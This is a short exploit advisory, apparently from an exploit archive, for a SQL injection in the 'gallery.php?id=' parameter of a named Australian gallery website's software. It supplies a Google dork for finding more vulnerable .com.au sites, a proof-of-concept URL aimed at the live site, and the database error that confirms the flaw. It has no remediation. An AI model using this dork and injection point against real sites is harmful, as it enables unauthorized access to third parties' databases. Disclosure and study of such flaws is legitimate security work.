Melbourne Fineart Gallery Australia version 1.0 suffers from a remote SQL injection vulnerability.
bef86bf6bb324625f40d63aba3aa19da
##################################################################################
# Exploit Title : Melbourne Fineart Gallery Australia 1.0 SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Date : 30/12/2018
# Vendor Homepage : melbournefineart.com.au
# Tested On : Windows
# Exploit Risk : Medium
# Version Information : 1.0 - Apache 2.0.53 - PHP 4.3.11
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL
Command ('SQL Injection') ]
# CXSecurity Exploit Link : cxsecurity.com/ascii/WLB-2018050294
##################################################################################
# Google Dork : ''inurl:''/gallery.php?id='' site:com.au
# Exploit : /gallery.php?id=[SQL Injection ]
# Example Site =>
melbournefineart.com.au/gallery.php?id=18%27 [ Proof of Concept for SQL
Injection ] => archive.is/heFX2
# SQL/DB Error -- [You have an error in your SQL syntax; check the manual
that corresponds
to your MySQL server version for the right syntax to use near '' order by
image_order limit 1' at line 1]
##################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
##################################################################################